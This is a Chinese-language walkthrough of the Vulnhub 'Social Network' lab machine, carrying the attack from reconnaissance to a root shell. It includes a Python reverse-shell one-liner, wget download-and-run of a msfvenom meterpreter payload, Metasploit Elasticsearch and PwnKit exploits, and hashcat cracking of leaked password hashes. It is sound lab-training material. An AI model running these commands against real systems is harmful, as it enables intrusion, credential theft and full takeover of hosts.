Vulnhub之BoredHackerBlog: Social Network_Medium Socnet详细测试过程（拿到root shell)

BoredHackerBlog: Social Network

作者：jason huawen

靶机信息

名称：

BoredHackerBlog: Social Network

地址：

https://www.vulnhub.com/entry/boredhackerblog-social-network,454/

识别目标主机IP地址

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                              _____________________________________________________________________________   IP            At MAC Address     Count     Len  MAC Vendor / Hostname       ----------------------------------------------------------------------------- 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                             192.168.56.100  08:00:27:af:83:c9      1      60  PCS Systemtechnik GmbH                                                     192.168.56.254  08:00:27:87:d5:96      1      60  PCS Systemtechnik GmbH       

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Socnet]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scanStarting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 00:38 EDTNmap scan report for www.armour.local (192.168.56.254)Host is up (0.00029s latency).Not shown: 65533 closed tcp ports (reset)PORT     STATE SERVICE VERSION22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   1024 cc5320b810db525f1602bcee572280e1 (DSA)|   2048 0150f61f32e80dfc48383ec81bac2002 (RSA)|   256 3bae9abdcbff8f546432ecbf38fdfe6b (ECDSA)|_  256 774e8b207352a4ee931db385f225d755 (ED25519)5000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15)|_http-title: Leave a messageMAC Address: 08:00:27:87:D5:96 (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NMAP扫描结果表明目标主机有2个开放端口：22（ssh)、5000（http)

获得Shell

──(kali㉿kali)-[~/Vulnhub/Socnet]└─$ gobuster dir -u http://192.168.56.254:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh===============================================================Gobuster v3.3by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.56.254:5000[+] Method:                  GET[+] Threads:                 10[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.3[+] Extensions:              js,html,txt,sh,php[+] Timeout:                 10s===============================================================2023/04/08 00:44:15 Starting gobuster in directory enumeration mode===============================================================/admin                (Status: 200) [Size: 401]

发现了/admin目录，而我们在namp结果知道目标运行Python环境

当输入正确的python代码时,比如print(“jason”),返回结果：

Status:Ran the code

当故意输入有错误的python代码时，则返回结果：

Status:Something went wrong with running the code

因此接下来设法得到反向shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

这里不需要前面的python -c

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.206",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

┌──(kali㉿kali)-[~/Vulnhub/Socnet]└─$ sudo nc -nlvp 5555                                         [sudo] password for kali: listening on [any] 5555 ...connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39946/app # iduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)/app # ip a1: lo:  mtu 65536 qdisc noqueue state UNKNOWN     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo       valid_lft forever preferred_lft forever4: eth0:  mtu 1500 qdisc noqueue state UP     link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0       valid_lft forever preferred_lft forever/app # 

这应该是在容器中。

将编译后的nmap上传到目标容器中

/app # which wget/usr/bin/wget/app # cd /tmp/tmp # wget http://192.168.56.206:8000/nmapConnecting to 192.168.56.206:8000 (192.168.56.206:8000)nmap                 100% |*******************************|  5805k  0:00:00 ETA/tmp # chmod +x nmap/tmp # ./nmap 172.17.0./16/tmp # ./nmap 172.17.0.0/24 Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-04-08 05:00 UTCUnable to find nmap-services!  Resorting to /etc/servicesCannot find nmap-payloads. UDP payloads are disabled.Nmap scan report for 172.17.0.1Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performedHost is up (0.000042s latency).Not shown: 1288 closed portsPORT   STATE SERVICE22/tcp open  sshMAC Address: 02:42:A1:9D:B7:15 (Unknown)Nmap scan report for 172.17.0.3Host is up (0.000044s latency).Not shown: 1288 closed portsPORT     STATE SERVICE9200/tcp open  wap-wspMAC Address: 02:42:AC:11:00:03 (Unknown)

经过扫描发现172.17.0.3容器开放9200端口，运行elasticsearch服务

接下来利用metasploit工具生成meterpreter会话

┌──(kali㉿kali)-[~/Vulnhub/Socnet]└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload[-] No arch selected, selecting arch: x86 from the payloadNo encoder specified, outputting raw payloadPayload size: 123 bytesFinal size of elf file: 207 bytesSaved as: escalate.elf

将Mesfvenom工具生成的escalate.elf文件上传之目标容器（172.17.0.2）

/tmp # wget http://192.168.56.206:8000/escalate.elfConnecting to 192.168.56.206:8000 (192.168.56.206:8000)escalate.elf         100% |*******************************|   207   0:00:00 ETA/tmp # chmod +x escalate.elf/tmp # ./escalate.elf

Module options (exploit/multi/handler):   Name  Current Setting  Required  Description   ----  ---------------  --------  -----------Payload options (linux/x86/meterpreter/reverse_tcp):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST                   yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Wildcard TargetView the full module info with the info, or info -d command.msf6 exploit(multi/handler) > set LHOST 192.168.56.206LHOST => 192.168.56.206msf6 exploit(multi/handler) > set LPORT 6666LPORT => 6666msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.56.206:6666 [*] Sending stage (1017704 bytes) to 192.168.56.254[*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.254:53521) at 2023-04-08 01:11:37 -0400meterpreter > 

在Kali Linux上成功得到meterpreter会话，接下里建立端口转发，到172.17.0.3的elasticservice端口

meterpreter > run autoroute -s 172.17.0.0/16meterpreter > portfwd add -l 9200 -p 9200 -r 172.17.0.3[*] Forward TCP relay created: (local) :9200 -> (remote) 172.17.0.3:9200meterpreter > background[*] Backgrounding session 1...msf6 exploit(multi/handler) > search elasticsearchMatching Modules================   #  Name                                              Disclosure Date  Rank       Check  Description   -  ----                                              ---------------  ----       -----  -----------   0  exploit/multi/elasticsearch/script_mvel_rce       2013-12-09       excellent  Yes    ElasticSearch Dynamic Script Arbitrary Java Execution   1  auxiliary/scanner/elasticsearch/indices_enum                       normal     No     ElasticSearch Indices Enumeration Utility   2  exploit/multi/elasticsearch/search_groovy_script  2015-02-11       excellent  Yes    ElasticSearch Search Groovy Sandbox Bypass   3  auxiliary/scanner/http/elasticsearch_traversal                     normal     Yes    ElasticSearch Snapshot API Directory Traversal   4  exploit/multi/misc/xdh_x_exec                     2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code ExecutionInteract with a module by name or index. For example info 4, use 4 or use exploit/multi/misc/xdh_x_execmsf6 exploit(multi/handler) > use exploit/multi/elasticsearch/search_groovy_script[*] No payload configured, defaulting to java/meterpreter/reverse_tcpmsf6 exploit(multi/elasticsearch/search_groovy_script) > show options Module options (exploit/multi/elasticsearch/search_groovy_script):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us                                         ing-metasploit.html   RPORT      9200             yes       The target port (TCP)   SSL        false            no        Negotiate SSL/TLS for outgoing connections   TARGETURI  /                yes       The path to the ElasticSearch REST API   VHOST                       no        HTTP server virtual hostPayload options (java/meterpreter/reverse_tcp):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen portExploit target:   Id  Name   --  ----   0   ElasticSearch 1.4.2View the full module info with the info, or info -d command.msf6 exploit(multi/elasticsearch/search_groovy_script) > set RHOSTS localhostRHOSTS => localhostmsf6 exploit(multi/elasticsearch/search_groovy_script) > set LHOST 192.168.56.206LHOST => 192.168.56.206msf6 exploit(multi/elasticsearch/search_groovy_script) > set LPORT 8888LPORT => 8888msf6 exploit(multi/elasticsearch/search_groovy_script) > run[*] Exploiting target 0.0.0.1[*] Started reverse TCP handler on 192.168.56.206:8888 [*] Checking vulnerability...[-] Exploit aborted due to failure: unknown: 0.0.0.1:9200 - Java has not been executed, aborting...[*] Exploiting target 127.0.0.1[*] Started reverse TCP handler on 192.168.56.206:8888 [*] Checking vulnerability...[*] Discovering TEMP path...[+] TEMP path on '/tmp'[*] Discovering remote OS...[+] Remote OS is 'Linux'[*] Trying to load metasploit payload...[*] Sending stage (58829 bytes) to 192.168.56.254[+] Deleted /tmp/IVCQL.jar[*] Meterpreter session 2 opened (192.168.56.206:8888 -> 192.168.56.254:55487) at 2023-04-08 01:17:49 -0400[*] Session 2 created in the background.

msf6 exploit(multi/elasticsearch/search_groovy_script) > sessions -lActive sessions===============  Id  Name  Type                    Information          Connection  --  ----  ----                    -----------          ----------  1         meterpreter x86/linux   root @ 172.17.0.2    192.168.56.206:6666 -> 192.168.56.254:53521 (172.17.0.2)  2         meterpreter java/linux  root @ 2c3ee4ccef61  192.168.56.206:8888 -> 192.168.56.254:55487 (127.0.0.1)

在172.17.0.3的shell中发现文件passwords

cat passwordsFormat: number,number,number,number,lowercase,lowercase,lowercase,lowercaseExample: 1234abcdjohn:3f8184a7343664553fcb5337a3138814 test:861f194e9d6118f3d942a72be3e51749admin:670c3bbc209a18dde5446e5e6c1f1d5broot:b3d34352fc26117979deabdf1b9b6354jane:5c158b60ed97c723b673529b8a3cf72b

并且给出了密码的格式：

number,number,number,number,lowercase,lowercase,lowercase,lowercase

数字数字数字数字数字小写字母小写字母小写字母

接下里用hashcat进行破解

(kali㉿kali)-[~/Vulnhub/Socnet]└─$ hashcat --username -m 0 -a 3 hashes  -1 ?d -2 ?l ?1?1?1?1?2?2?2?2 --force5c158b60ed97c723b673529b8a3cf72b:1234jane                 b3d34352fc26117979deabdf1b9b6354:1234pass                 670c3bbc209a18dde5446e5e6c1f1d5b:1111pass                 861f194e9d6118f3d942a72be3e51749:1234test      

得到john等的用户的密码，登录john的ssh：

然后

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf

将该payload上传到目标主机，同时在Kali LInux启动msfconsole,从而得到meterpreter会话，得到meterpreter会话后，利用suggester模块找到本地提权模块，然后提权到root

msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcpmsf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):   Name          Current Setting  Required  Description   ----          ---------------  --------  -----------   PKEXEC_PATH                    no        The path to pkexec binary   SESSION                        yes       The session to run this module on   WRITABLE_DIR  /tmp             yes       A directory where we can write filesPayload options (linux/x64/meterpreter/reverse_tcp):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen portExploit target:   Id  Name   --  ----   0   x86_64View the full module info with the info, or info -d command.msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.206LHOST => 192.168.56.206msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888LPORT => 8888msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1SESSION => 1msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run[*] Started reverse TCP handler on 192.168.56.206:8888 [*] Running automatic check ("set AutoCheck false" to disable)[!] Verify cleanup of /tmp/.uvuqtex[+] The target is vulnerable.[*] Writing '/tmp/.qzwtfgo/woyhnxwzfn/woyhnxwzfn.so' (548 bytes) ...[!] Verify cleanup of /tmp/.qzwtfgo

meterpreter >  shellProcess 1737 created.Channel 1 created.iduid=0(root) gid=0(root) groups=0(root),1001(john)cd /rootls -alhtotal 20Kdrwx------  2 root root 4.0K Oct 28  2018 .drwxr-xr-x 22 root root 4.0K Oct 27  2018 ..-rw-------  1 root root    9 Oct 28  2018 .bash_history-rw-r--r--  1 root root 3.1K Feb 19  2014 .bashrc-rw-r--r--  1 root root  140 Feb 19  2014 .profile

从而得到root shell.

STRIVE FOR PROGRESS,NOT FOR PERFECTION